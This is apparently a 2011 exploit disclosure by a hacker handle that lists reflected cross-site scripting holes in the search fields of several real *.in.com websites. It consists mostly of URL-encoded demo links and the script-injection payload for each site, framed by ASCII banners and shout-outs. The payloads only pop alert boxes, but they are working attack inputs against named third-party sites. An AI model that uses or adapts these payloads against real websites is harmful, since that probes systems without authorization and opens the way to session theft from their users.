%+
$.......#........4.........|)........0............\/\/       %+


                                              %+
                                                       %+

                                              %+++++++++++++++++++++++++++++
+++++++++++


# Exploit Title: *.in.com XSS vulnerability
# Vendor: various
# Date: 6th july,2011
# Author: r007k17 a.k.a Raghavendra Karthik D
# link: http://shadowrootkit.wordpress.com/
# Google Dork:   © Copyright 2010, Business.in.com
************************************************************
************************************************************
********************
*****************************


{DEMO} :
http://business.in.com/search.php?searchtext=%22%3E%3Cscript%3Ealert%28/s/%29%3C/script%3E

EXPLOIT: "><script>alert(/s/)</script>


{DEMO} :
http://cricketnext.in.com/search/searchnews.php?search_value=%22%3E%3Cscript%3Ealert%28%2Fs%2F%29%3C%2Fscript%3E

EXPLOIT: "><script>alert(/s/)</script>


{DEMO} :
http://hooked-in.com/waterbodies/search?q=%22%3E%3Cscript%3Ealert%28%2Fr007k17%2F%29%3C%2Fscript%3E

EXPLOIT: "><script>alert(/r007k17/)</script>


 Reflected XSS in  connect.in.com
 Inject EXPLOIT below in search field in http://connect.in.com
observe a pop-up saying r007k17

{DEMO} :   http://connect.in.com

EXPLOIT: "><script>alert(/r007k17/)</script>



************************************************************
************************************************************
*********************************************
sp3c14l Thanks to s1d3^effects and my friends@!3.14--
************************************************************
*********************************************************************************************************